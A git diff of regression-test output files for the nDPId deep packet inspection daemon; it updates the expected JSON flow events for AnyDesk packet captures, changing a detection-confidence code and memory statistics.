-01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595379,"flow_last_seen":1613977595380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1613977595380,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01481{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1613977595379,"flow_last_seen":1613977595391,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1705,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1613977595391,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"ee644a8a34c434abca4b737ec1d9efad","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"F8:4E:27:4E:F9:33:35:2F:1A:69:71:D5:02:6B:B8:72:EF:B7:BA:B0"}} +01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595379,"flow_last_seen":1613977595380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1613977595380,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01481{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1613977595379,"flow_last_seen":1613977595391,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1705,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1613977595391,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"ee644a8a34c434abca4b737ec1d9efad","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"F8:4E:27:4E:F9:33:35:2F:1A:69:71:D5:02:6B:B8:72:EF:B7:BA:B0"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977595407,"flow_last_seen":1613977595407,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1613977595407,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1613977595407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1613977595407,"pkt":"2MuK4S0uKDc3AG3ICABFAABAAABAAEAGtfrAqAGywKgBu8tHG54tLA3cAAAAALAC\/\/97PgAAAgQFtAEDAwUBAQgKHE34xQAAAAAEAgAA"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1613977595407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1613977595407,"pkt":"KDc3AG3I2MuK4S0uCABFAAA0dDlAAIAGAADAqAG7wKgBshuey0dV\/SLKLSwN3YAS\/\/+E5AAAAgQFtAEDAwgBAQQC"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1613977595407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1613977595407,"pkt":"2MuK4S0uKDc3AG3ICABFAAAoAABAAEAGthLAqAGywKgBu8tHG54tLA3dVf0iy1AQIABwXwAAAAAAAAAA"} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595407,"flow_last_seen":1613977595408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1613977595408,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01579{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1613977595407,"flow_last_seen":1613977595549,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":813,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1613977595549,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"4b505adfb4a921c5a3a39d293b0811e1","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"86:4F:2A:9F:24:71:FD:0D:6A:35:56:AC:D8:7B:3A:19:E8:03:CA:2E"}} -01279{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1613977595407,"flow_last_seen":1613977595964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1286,"flow_tot_l4_payload_len":3316,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} -01182{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2502,"flow_first_seen":1613977595379,"flow_last_seen":1613977618224,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5506,"flow_tot_l4_payload_len":2002706,"flow_avg_l4_payload_len":800,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613977585542,"flow_last_seen":1613977585553,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613977585247,"flow_last_seen":1613977585260,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595407,"flow_last_seen":1613977595408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1613977595408,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01579{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1613977595407,"flow_last_seen":1613977595549,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":813,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1613977595549,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"4b505adfb4a921c5a3a39d293b0811e1","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"86:4F:2A:9F:24:71:FD:0D:6A:35:56:AC:D8:7B:3A:19:E8:03:CA:2E"}} +01279{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1613977595407,"flow_last_seen":1613977595964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1286,"flow_tot_l4_payload_len":3316,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} +01182{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2502,"flow_first_seen":1613977595379,"flow_last_seen":1613977618224,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5506,"flow_tot_l4_payload_len":2002706,"flow_avg_l4_payload_len":800,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613977585542,"flow_last_seen":1613977585553,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613977585247,"flow_last_seen":1613977585260,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","packets-captured":2521,"packets-processed":2521,"total-skipped-flows":0,"total-l4-payload-len":2006246,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":4,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1613977618224} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2521/2521 @@ -35,9 +35,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5958193 bytes -~~ total memory freed........: 5958193 bytes -~~ total allocations/frees...: 120658/120658 +~~ total memory allocated....: 6091827 bytes +~~ total memory freed........: 6091827 bytes +~~ total allocations/frees...: 123420/123420 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 455 chars ~~ json string max len.......: 1584 chars diff --git a/test/results/anydesk.pcap.out b/test/results/anydesk.pcap.out index 855cc70da..6d5e49410 100644 --- a/test/results/anydesk.pcap.out +++ b/test/results/anydesk.pcap.out @@ -2,18 +2,18 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1591342198821} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342198821,"flow_last_seen":1591342198821,"flow_idle_time":7580000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1591342198821,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1591342198821,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1591342198821,"pkt":"AFBW5dKtAAwplUdeCABFAABbtopAAEAGCwXAqJWBM1PvkI3\/AFB7i54qMVwSUlAY+DR5WwAAFwMDAC7mz9mv7V5op8uDzrVlyYzGPOa22i4SIRv\/ctzVUMWyqJzhwIdSdK\/Qd7DJrcKc"} -00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342198821,"flow_last_seen":1591342198821,"flow_idle_time":7580000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1591342198821,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} +00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342198821,"flow_last_seen":1591342198821,"flow_idle_time":7580000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1591342198821,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1591342198821,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1591342198821,"pkt":"AAwplUdeAFBW5dKtCABFAAAoe1AAAIAGRnIzU++QwKiVgQBQjf8xXBJSe4ueXVAQ+vBP7wAAAAAAAAAA"} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1591342198998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1591342198998,"pkt":"AFBW5dKtAAwplUdeCABFAABYtotAAEAGCwfAqJWBM1PvkI3\/AFB7i55dMVwSUlAY+DR5WAAAFwMDACvmz9mv7V5oqHbrZghdQbdzwBFFDzsTJ43BfdwI8acT8HfThIVfMXtYD9Ln"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342199201,"flow_last_seen":1591342199201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1591342199201,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1591342199201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1591342199201,"pkt":"AFBW5dKtAAwplUdeCABFAAA8CJBAAEAGudPAqJWBM1Pu26oPAFApppzyAAAAAKAC+vB4hwAAAgQFtAQCCAqukMx3AAAAAAEDAwc="} 